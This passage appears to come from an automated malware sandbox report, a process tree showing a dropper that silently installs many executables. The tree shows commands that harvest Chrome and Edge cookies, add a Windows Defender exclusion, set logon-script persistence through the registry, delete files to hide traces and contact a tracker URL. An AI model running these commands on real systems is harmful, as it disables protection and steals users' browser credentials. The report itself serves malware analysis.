- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 8883⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 11283⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 10643⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
-
C:\Users\Admin\Documents\ep_w4UBkXtmsr5S8c_BCYuj9.exe"C:\Users\Admin\Documents\ep_w4UBkXtmsr5S8c_BCYuj9.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1248 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im ep_w4UBkXtmsr5S8c_BCYuj9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ep_w4UBkXtmsr5S8c_BCYuj9.exe" & del C:\ProgramData\*.dll & exit3⤵PID:5076
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ep_w4UBkXtmsr5S8c_BCYuj9.exe /f4⤵
- Kills process with taskkill
PID:5988
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:4460
-
-
-
-
C:\Users\Admin\Documents\9AU9I15CCD6EpK299hgTkZdS.exe"C:\Users\Admin\Documents\9AU9I15CCD6EpK299hgTkZdS.exe"2⤵
- Executes dropped EXE
PID:2276 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\9AU9I1~1.DLL,s C:\Users\Admin\DOCUME~1\9AU9I1~1.EXE3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4580 -
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\9AU9I1~1.DLL,plFVMg==4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
PID:8056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\9AU9I1~1.DLL5⤵PID:6392
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\9AU9I1~1.DLL,VxRCTg==5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:1952 -
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 178976⤵
- Modifies Internet Explorer settings
PID:8756 -
C:\Windows\system32\ctfmon.exectfmon.exe7⤵PID:6512
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp585E.tmp.ps1"5⤵PID:2612
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp787D.tmp.ps1"5⤵PID:6052
-
C:\Windows\SysWOW64\nslookup.exe"C:\Windows\system32\nslookup.exe" -type=any localhost6⤵PID:4204
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask5⤵PID:8332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask5⤵PID:4120
-
-
-
-
-
C:\Users\Admin\Documents\7TAW5mYXsk9p20DliYoWKdYO.exe"C:\Users\Admin\Documents\7TAW5mYXsk9p20DliYoWKdYO.exe"2⤵
- Executes dropped EXE
PID:3300
-
-
C:\Users\Admin\Documents\lDjuHqMg4MkTM1qdSGZyxIsk.exe"C:\Users\Admin\Documents\lDjuHqMg4MkTM1qdSGZyxIsk.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1108 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5864
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6744
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5504
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:4240
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:512 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5504
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5464
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6576
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 512 -s 15404⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6996
-
-
-
-
C:\Users\Admin\Documents\BfBxd79SbWYrnSnDsotyYWPf.exe"C:\Users\Admin\Documents\BfBxd79SbWYrnSnDsotyYWPf.exe"2⤵PID:4244
-
C:\Users\Admin\AppData\Local\Temp\is-PFG92.tmp\BfBxd79SbWYrnSnDsotyYWPf.tmp"C:\Users\Admin\AppData\Local\Temp\is-PFG92.tmp\BfBxd79SbWYrnSnDsotyYWPf.tmp" /SL5="$1029E,138429,56832,C:\Users\Admin\Documents\BfBxd79SbWYrnSnDsotyYWPf.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\is-0JQRG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0JQRG.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4024 -
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4788 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit6⤵PID:4780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im runvd.exe /f7⤵
- Kills process with taskkill
PID:4428
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Executes dropped EXE
- Delays execution with timeout.exe
PID:5332
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
PID:5136 -
C:\Users\Admin\AppData\Local\Temp\is-I9V4U.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-I9V4U.tmp\Inlog.tmp" /SL5="$10366,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\is-GEMCP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GEMCP.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:4832
-
C:\Users\Admin\AppData\Local\Temp\is-KPDNI.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KPDNI.tmp\Setup.tmp" /SL5="$2029E,17361252,721408,C:\Users\Admin\AppData\Local\Temp\is-GEMCP.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5204 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-2LMHF.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:6040
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
PID:4244
-
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-2LMHF.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
PID:5844
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:1344
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:8264
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2LMHF.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-2LMHF.tmp\{app}\vdi_compiler"9⤵PID:1940
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-2LMHF.tmp\{app}\vdi_compiler.exe"10⤵PID:1332
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 411⤵
- Runs ping.exe
PID:8076
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵
- Checks computer location settings
PID:6740
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵PID:6192
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5168 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629398497 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:9080
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
PID:5224 -
C:\Users\Admin\AppData\Local\Temp\is-9VVQT.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-9VVQT.tmp\WEATHER Manager.tmp" /SL5="$1036A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5360 -
C:\Users\Admin\AppData\Local\Temp\is-UP2GC.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-UP2GC.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6712 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-UP2GC.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-UP2GC.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629398497 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:6888
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5384 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:6784
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6432
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵PID:5456
-
C:\Users\Admin\AppData\Local\Temp\is-90J2V.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-90J2V.tmp\MediaBurner2.tmp" /SL5="$103F4,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5712 -
C:\Users\Admin\AppData\Local\Temp\is-EP6SQ.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-EP6SQ.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:6856 -
C:\Program Files\Windows Photo Viewer\BNDPNRMQKM\ultramediaburner.exe"C:\Program Files\Windows Photo Viewer\BNDPNRMQKM\ultramediaburner.exe" /VERYSILENT8⤵PID:8064
-
C:\Users\Admin\AppData\Local\Temp\is-AQ48H.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-AQ48H.tmp\ultramediaburner.tmp" /SL5="$40242,281924,62464,C:\Program Files\Windows Photo Viewer\BNDPNRMQKM\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4728 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:7552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\be-cbcc0-150-6ed99-f561324429d1a\Jobenaeshaco.exe"C:\Users\Admin\AppData\Local\Temp\be-cbcc0-150-6ed99-f561324429d1a\Jobenaeshaco.exe"8⤵PID:2216
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 21849⤵PID:8672
-
-
-
C:\Users\Admin\AppData\Local\Temp\c2-8cdfb-52c-06a9f-cf68f42c71a1c\Tavugapydae.exe"C:\Users\Admin\AppData\Local\Temp\c2-8cdfb-52c-06a9f-cf68f42c71a1c\Tavugapydae.exe"8⤵PID:7280
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ndsabv4g.ljo\GcleanerEU.exe /eufive & exit9⤵PID:6204
-
C:\Users\Admin\AppData\Local\Temp\ndsabv4g.ljo\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ndsabv4g.ljo\GcleanerEU.exe /eufive10⤵PID:8412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g5vdd1i4.hs2\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:8396
-
C:\Users\Admin\AppData\Local\Temp\g5vdd1i4.hs2\installer.exeC:\Users\Admin\AppData\Local\Temp\g5vdd1i4.hs2\installer.exe /qn CAMPAIGN="654"10⤵PID:8760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z2mgjbc2.w4l\ufgaa.exe & exit9⤵PID:8668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\45lkqnho.i5y\anyname.exe & exit9⤵PID:8368
-
C:\Users\Admin\AppData\Local\Temp\45lkqnho.i5y\anyname.exeC:\Users\Admin\AppData\Local\Temp\45lkqnho.i5y\anyname.exe10⤵PID:7040
-
C:\Users\Admin\AppData\Local\Temp\45lkqnho.i5y\anyname.exe"C:\Users\Admin\AppData\Local\Temp\45lkqnho.i5y\anyname.exe" -q11⤵PID:8840
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0itwzuvl.woa\gcleaner.exe /mixfive & exit9⤵PID:8788
-
C:\Users\Admin\AppData\Local\Temp\0itwzuvl.woa\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\0itwzuvl.woa\gcleaner.exe /mixfive10⤵PID:5304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dtipy1ns.fv4\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:7480
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
PID:5512 -
C:\Users\Admin\AppData\Roaming\2142900.exe"C:\Users\Admin\AppData\Roaming\2142900.exe"6⤵
- Executes dropped EXE
PID:6704
-
-
C:\Users\Admin\AppData\Roaming\5964124.exe"C:\Users\Admin\AppData\Roaming\5964124.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:6772
-
-
C:\Users\Admin\AppData\Roaming\2117111.exe"C:\Users\Admin\AppData\Roaming\2117111.exe"6⤵
- Executes dropped EXE
PID:6792
-
-
C:\Users\Admin\AppData\Roaming\7831575.exe"C:\Users\Admin\AppData\Roaming\7831575.exe"6⤵
- Executes dropped EXE
PID:6864
-
-
C:\Users\Admin\AppData\Roaming\8250286.exe"C:\Users\Admin\AppData\Roaming\8250286.exe"6⤵PID:6912
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
PID:5612 -
C:\Users\Admin\AppData\Local\Temp\tmp3530_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp3530_tmp.exe"6⤵PID:4640
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5348
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵PID:3184
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:7452
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵PID:6152
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6720 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6892 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7848 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6160 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
- Suspicious use of SendNotifyMessage
PID:6352 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Suspicious use of SendNotifyMessage
PID:8012 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
- Suspicious use of SendNotifyMessage
PID:8540 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵PID:8856
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵PID:9152
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
- Suspicious use of SendNotifyMessage
PID:7652 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Suspicious use of SendNotifyMessage
PID:9148 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
- Suspicious use of SendNotifyMessage
PID:8952 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
- Suspicious use of SendNotifyMessage
PID:6920 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵PID:9024
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
- Suspicious use of SendNotifyMessage
PID:8856 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
- Suspicious use of SendNotifyMessage
PID:8816 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
- Suspicious use of SendNotifyMessage
PID:9048 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵PID:7040
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵PID:5936
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵PID:5992
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵PID:8300
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵PID:6780
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵PID:7232
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵PID:5808
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵PID:6480
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵PID:1852
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵
- Suspicious use of SetThreadContext
PID:5188 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵PID:6432
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵PID:9144
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵PID:2288
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵PID:8548
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵PID:1720
-
